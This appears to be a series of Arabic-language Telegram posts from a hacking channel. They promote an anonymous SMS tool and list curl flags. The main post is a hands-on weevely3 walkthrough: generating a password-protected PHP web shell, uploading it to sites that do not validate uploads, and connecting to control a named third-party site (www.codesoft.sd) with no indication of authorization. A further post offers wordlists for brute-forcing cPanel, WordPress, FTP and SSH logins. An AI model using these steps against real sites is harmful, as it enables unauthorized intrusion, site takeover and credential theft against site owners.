ERROR 404 BULLET MHS

مجتمع عربي مشترك خاص بالبرمجة وأمن المعلومات https://t.me/Hackers_Of_Arabs

💻 - إصدار جديد للاداة : $ git clone https://github.com/X-HACKRAWI/FreeSms $ cd FreeSms $ bash Run.sh قم باختيار الخيار الذي تريد ويستحسن اختيار الرقم 3 اولا لحل المشاكل قبل كل شيء وبعد الانتهاء قم باختيار الرقم 1 لتشغيل الاداة سيطلب منك اولا مفتاح الدولة ( فقط ) : وبعد ان تقوم بادخاله سيطلب منك الرقم وحسب وبعدها النص الذي تريد للرساله سيكون من السهل الكتابه بالانجليزيه ولكن اذا اردت الكتابة بالعربيه قم بالكتابة في اي مكان اخر مثل المذكره الخاصه بالهاتف ثم قم بلصق النص وحسب 💡 - في اليوم الواحد يسمح رساله واحده وحسب تفاصيل اكثر في الشرح السابق 👨‍💻 - مطور الاداة : @HackRawi

اكثر الاشياء الي استخدمها في curl ---------------------- -H تضيف لك header مع الطلب -A تعدل على الuser agent -X تحدد نوع الطلب -s ما تعرض تحميل للرابط -i تعرض الطلب مع الاستجابه ----------------------

توضيح لانشاء الملف وحتى التحكم بالسيرفر

🎲 - اداة weevely : ⭕️ - اداة مخصصة لاختبار اختراق المواقع فهي تقوم برفع Shell على الموقع والتحكم به وكما انها سهلة الاستخدام سنقوم بشرحها عملياً على احد المواقع من انشاء ملف Shell حتى التحكم بالموقع [+] - كما ان الاداة تسمح لنا بجلب قواعد بيانات Sql ورفع ملفات او سحب ملفات وغيرها. [-] - اولاً يمكنكم تحميل الاداة بهذه الطريقه فقط قم بكتابة ما بعد [ # ] bullet@mhs:~# git clone https://github.com/epinna/weevely3 🖱 - بعد ان قمنا بتحميلها نقوم بالدخول إلى ملف الاداة bullet@mhs:~# cd weevely3/ 🗜 - سنرى العديد من الملفات ما يهمنا هو ملفين فقط وهم 1- requirements.txt 2- weevely.py ويمكنك قراءه ال Reademe ايضا لا احد سيقوم بمنعك يا عزيزي 📡 - الملف الاول فيه اسماء المكاتب التي قد تكون غير مثبته على النظام الذي تستخدمه ولكي لا تواجهك اي مشاكل فقط قم بكتابة bullet@mhs:~# pip install -r requirements.txt 💡- الان حان وقت انشاء الملف الخبيث او الجيد من نضرك ! نقوم بكتابة : bullet@mhs:~# python weevely.py generate bullet#123|mhs $HOME/mhs.php مالذي مكتوب في الاعلى ? اولا قمنا بتشغيل الاداه عبر python وبعدها ملف الاداة ثم قمت باستخدام الخيار generate وهو احد الخيارات في الاداة للانشاء ثم بعدها قمت بعمل كلمة سر الا وهي bullet#123|mhs ما فائده كلمة السر ? وكيف استخدمها ? لا تستعجل ساخبرك حينما نصل يا عزيزي ! ثم بعدها قمت باختيار المسار الذي سينحفظ فيه الملف وهو $HOME/mhs.php الان نقوم برفع الملف على بعض المواقع التي لا تقوم بالتحقق من محتوى الملفات يمكنك التجربه على هذا الموقع والذي سارفق صور بالاسفل توضح بعض المفاهيم في الشرح : www.codesoft.sd الان وبعد ان قمنا بتجهيز الملف ورفعه نقوم بجلب مسار الملف بعد ان تم رفعه وهناك العديد من الطرق اولا اما الموقع بنفسه سيقوم باظهار المسار او قم بالدخول إلى ملف Uploads الذي قد يعتبره المطور لا ضرر باضهاره وانت قم بالبحث عن اسم ملفك بينهم وبعد ان تقوم بجلب المسار مع اسم الموقع نقوم بفتح التيرمنال وكتابة : ِbullet@mhs:~# python weevely.py www.codesoft.sd/mhs.php bullet#123|mhs بعد ان قمنا بتشغيل الاداه قمنا بنفس السطر بعمل المسار الذي يتواجد فيه الملف الخاص بنا ثم مسافة ثم كلمة السر الخاصه بنا فتخيل اذا كان بدون كلمة سر هل من الجيد ان ياتي شخص اخر ويقوم بسرقة مجهودك ? بعدها سيقوم بفتح جلسة مع الموقع مع اظهار weevely> يمكنك كتابة help لاستعراض الاوامر 🎲 - إذا كنت ترى خطا مني او بشيء ناقص قم بكتابته في التعليقات 🔓 - للمزيد انضم على قناتنا : ⚙ - https://t.me/Penetration_TestingAr

🎲 - من افضل الملفات التي قد تراها من اجل التخمين على لوحات الادمن في المواقع مثل Cpanel او WordPress وغيرها 🔧 - او بعض البروتوكولات مثل FTP و SSH 🗂 - فهو يحتوي على اكثر من 40 ملف كل ملف خاص بشيء معين واستخدامها سهل جدا ! كلمة السر الخاصه بالملف : 🔐 - BULLETMHS ⭕️ - الملف ماخوذ من Github رايته رائع فشاركته معكم 🦦 للمزيد إنضم إلينا على التيليجرام عبر الرابط التالي : - https://t.me/Penetration_TestingAr

🎲 - تطبيق Linux Commands: 🌐 - تطبيق يستعرض لك " كل " الاوامر المخصصه لـ Linux كما انه مقسم إلى عدة اقسام ومنها قسم للتحكم بالنظام وقسم للمستخدمين والمجموعات وقسم للشبكات وقسم للبحث وقسم لادوات اختبار الاختراق وغيرها من الاقسام كما انه يعلمك اسرار ممتعه في لينكس مثل !! و * و ? اتمنى ان ينال اعجابكم